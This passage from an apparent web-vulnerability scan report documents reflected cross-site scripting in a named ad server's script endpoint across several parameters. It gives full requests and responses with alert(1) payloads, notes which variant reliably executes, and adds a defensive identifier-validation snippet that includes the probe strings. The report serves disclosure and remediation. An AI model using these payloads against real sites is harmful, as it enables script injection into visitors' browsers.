The value of the objectName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a375c'%3balert(1)//e99e5f54d4b was submitted in the objectName parameter. This input was echoed as a375c';alert(1)//e99e5f54d4b in the application's response.

In the response excerpt the value sits inside a single-quoted URL that is assigned to the src of a dynamically created script element (the callback= argument to controlSettings.php), so the single quote terminates that URL and the rest of the line is treated as code. The same value is also used further down as a bare identifier (var jvxAdPlayer... = new jivoxAdPlayer();, visible in the 4.81 response), where an unmatched single quote opens a string literal that runs into the line break. That is a syntax error, and a syntax error anywhere stops the whole script from being parsed, so the quote-free variant in 4.81 is the one to rely on for this parameter.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Because objectName is also used as a variable name and as a JSONP callback name, output encoding cannot make it safe in every context it reaches; it should be validated against an identifier pattern such as ^[A-Za-z_$][A-Za-z0-9_$]*$ (rejecting reserved words), or chosen by the server and not taken from the client at all.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayera375c'%3balert(1)//e99e5f54d4b&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:41 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57970
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...

var s = document.createElement('script');
s.type='text/javascript';
s.src= serverURL + '/jivox/serverAPIs/controlSettings.php?action=read&callback=jvxAdPlayera375c';alert(1)//e99e5f54d4b.returnControlSettingsCookie&name='+name+'&r='+jvxRandomNumber+'&t='+jvxTimeStamp.getTime();
document.getElementsByTagName('head')[0].appendChild(s);
},


...[SNIP]...

4.80. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96810"%3balert(1)//cac32923e7e was submitted in the objectName parameter. This input was echoed as 96810";alert(1)//cac32923e7e in the application's response.

The excerpt below shows the value in an identifier position (var jvxAdPlayer96810";alert(1)//... = new jivoxAdPlayer();), where the unmatched double quote opens a string literal that is never closed before the line break; the double-quoted string the scanner matched is a separate reflection of the same value elsewhere in the response. Since one syntax error prevents the whole script from running, treat 4.81 as the working proof of concept for this parameter.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. As with 4.79, the value also lands in an identifier position, so it must be validated against an identifier pattern rather than encoded.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer96810"%3balert(1)//cac32923e7e&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:38 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57970
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...

render : generateJivoxPlayerTags

}
};

if(typeof(jivoxAdPlayer) != "undefined"){
var jvxAdPlayer96810";alert(1)//cac32923e7e = new jivoxAdPlayer();
jvxAdPlayer96810";alert(1)//cac32923e7e.setPlayerWidth(300);
jvxAdPlayer96810";alert(1)//cac32923e7e.setPlayerHeight(250);
jvxAdPlayer96810";alert(1)//cac32923e7e.setServerURL("http://as.jivox.com");
jvxAdPlayer96810";alert(
...[SNIP]...

4.81. http://as.jivox.com/player/jivox_ad_tags.php [objectName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the objectName request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 54bce%3balert(1)//6751049e87a was submitted in the objectName parameter. This input was echoed as 54bce;alert(1)//6751049e87a in the application's response.

The response shows the value used directly as a JavaScript identifier (var jvxAdPlayer54bce;alert(1)//6751049e87a = new jivoxAdPlayer();), so no quote is needed: the semicolon ends the var declaration, alert(1) runs as a statement, and // comments out the remainder of the line. Every following line that references the object is split the same way, and, at least in the lines shown, the script still parses, which is what makes this the reliable variant of the three objectName findings.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Because the value is used as an identifier, no output encoding exists for this context; the only fixes are to validate objectName against an identifier pattern (for example ^[A-Za-z_$][A-Za-z0-9_$]*$, rejecting reserved words and capping the length) or to have the server assign the name.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer54bce%3balert(1)//6751049e87a&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:46 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57958
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
tivity,

retractOpenPanel : retractOpenPanel,


render : generateJivoxPlayerTags

}
};

if(typeof(jivoxAdPlayer) != "undefined"){
var jvxAdPlayer54bce;alert(1)//6751049e87a = new jivoxAdPlayer();
jvxAdPlayer54bce;alert(1)//6751049e87a.setPlayerWidth(300);
jvxAdPlayer54bce;alert(1)//6751049e87a.setPlayerHeight(250);
jvxAdPlayer54bce;alert(1)//6751049e87a.setSe
...[SNIP]...
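
The three objectName findings (4.79 to 4.81) differ from the rest of this report because the value is reflected as a variable name and as a JSONP callback name, not only inside string literals. There is no escaping for an identifier, so the fix has to be validation. The block below is an added example, not code from the XSS.CX report or from Jivox; the bootstrap template and the probes are constructed to resemble the responses above, and the fallback name jvxAdPlayer is taken from the legitimate request.

```javascript
// Added example: not the report's or Jivox's code. objectName is reflected in
// three contexts in the responses above: as the variable name in
// "var jvxAdPlayer... = new jivoxAdPlayer();", as the JSONP callback in a
// script src URL, and inside quoted strings. For the identifier position
// there is no output encoding, so the value has to be validated, not escaped.

// ASCII identifier grammar. Unicode identifiers are deliberately excluded:
// nothing here needs them and they only widen the attack surface.
const IDENTIFIER_RE = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

// Words that match the grammar but must never be accepted as a variable name.
const RESERVED = new Set([
  'break', 'case', 'catch', 'class', 'const', 'continue', 'debugger', 'default',
  'delete', 'do', 'else', 'export', 'extends', 'finally', 'for', 'function', 'if',
  'import', 'in', 'instanceof', 'new', 'return', 'super', 'switch', 'this', 'throw',
  'try', 'typeof', 'var', 'void', 'while', 'with', 'yield', 'let', 'static', 'enum',
  'await', 'implements', 'package', 'protected', 'interface', 'private', 'public',
  'null', 'true', 'false', 'eval', 'arguments',
]);

function isSafeObjectName(value, maxLen = 64) {
  return typeof value === 'string'
    && value.length > 0
    && value.length <= maxLen
    && IDENTIFIER_RE.test(value)
    && !RESERVED.has(value);
}

// A JSONP callback such as jvxAdPlayer.returnControlSettingsCookie is a dotted
// chain of identifiers; validate each segment with the same rule.
function isSafeCallbackName(value) {
  return typeof value === 'string'
    && value.split('.').every((segment) => isSafeObjectName(segment));
}

// Render the player bootstrap; an invalid name falls back to a fixed default
// rather than being "cleaned", so the output never depends on attacker bytes.
function renderPlayerTags(objectName, fallback = 'jvxAdPlayer') {
  const name = isSafeObjectName(objectName) ? objectName : fallback;
  return [
    'var ' + name + ' = new jivoxAdPlayer();',
    name + '.setPlayerWidth(300);',
    name + '.setPlayerHeight(250);',
  ].join('\n');
}

// Constructed probes modelled on 4.79, 4.80 and 4.81 (not the captured traffic).
const OBJECT_NAME_PROBES = [
  "jvxAdPlayera375c';alert(1)//e99e5f54d4b",
  'jvxAdPlayer96810";alert(1)//cac32923e7e',
  'jvxAdPlayer54bce;alert(1)//6751049e87a',
];

function checkProbes() {
  return OBJECT_NAME_PROBES.map((probe) => ({
    probe,
    accepted: isSafeObjectName(probe),   // false for all three
    rendered: renderPlayerTags(probe),   // uses the fallback name
  }));
}

console.log(checkProbes());
```

Falling back to a fixed name rather than stripping bad characters is deliberate: a "sanitised" identifier is still attacker-influenced, and with several reflection points it is easy to end up with a value that is harmless in one and not in another.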

4.82. http://as.jivox.com/player/jivox_ad_tags.php [pauseBetweenAds parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the pauseBetweenAds request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e16d"-alert(1)-"53b11bd0f73 was submitted in the pauseBetweenAds parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. pauseBetweenAds is a millisecond count (1000 in the legitimate request), so the value should be rejected unless it is a non-negative integer before it is placed in the flash-variables string.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=10008e16d"-alert(1)-"53b11bd0f73&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:29 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
DEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=10008e16d"-alert(1)-"53b11bd0f73&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/1
...[SNIP]...

4.83. http://as.jivox.com/player/jivox_ad_tags.php [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 997ac"-alert(1)-"8b668abcb76 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. r is a cache-busting random number (0.9127810774371028 in the legitimate request); accept only a decimal numeric literal and drop anything else.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028997ac"-alert(1)-"8b668abcb76&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:34 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
jvxAdPlayer.setPlayerWidth(300);
jvxAdPlayer.setPlayerHeight(250);
jvxAdPlayer.setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028997ac"-alert(1)-"8b668abcb76&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcSh
...[SNIP]...

4.84. http://as.jivox.com/player/jivox_ad_tags.php [reportingURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the reportingURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 235f6"-alert(1)-"1155aa007e6 was submitted in the reportingURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. reportingURL is, by its name, the endpoint the player sends events to; accept only an absolute http(s) URL whose origin is on an allowlist, and then encode it for the string context, since an allowlist alone does not protect the string literal and encoding alone does not stop the player reporting to an attacker's host.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com235f6"-alert(1)-"1155aa007e6&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:54 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
ion=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com235f6"-alert(1)-"1155aa007e6&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvxSessionId=1307963034.6078");
jvxAdPlayer.setPlayerObjectId("jvxAdPlayer");
jvxAdP
...[SNIP]...

4.85. http://as.jivox.com/player/jivox_ad_tags.php [restartOnUnmute parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the restartOnUnmute request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40ae9"-alert(1)-"bfa34e952f0 was submitted in the restartOnUnmute parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. restartOnUnmute is a flag (1 in the legitimate request); accept only 0 or 1.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=140ae9"-alert(1)-"bfa34e952f0&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
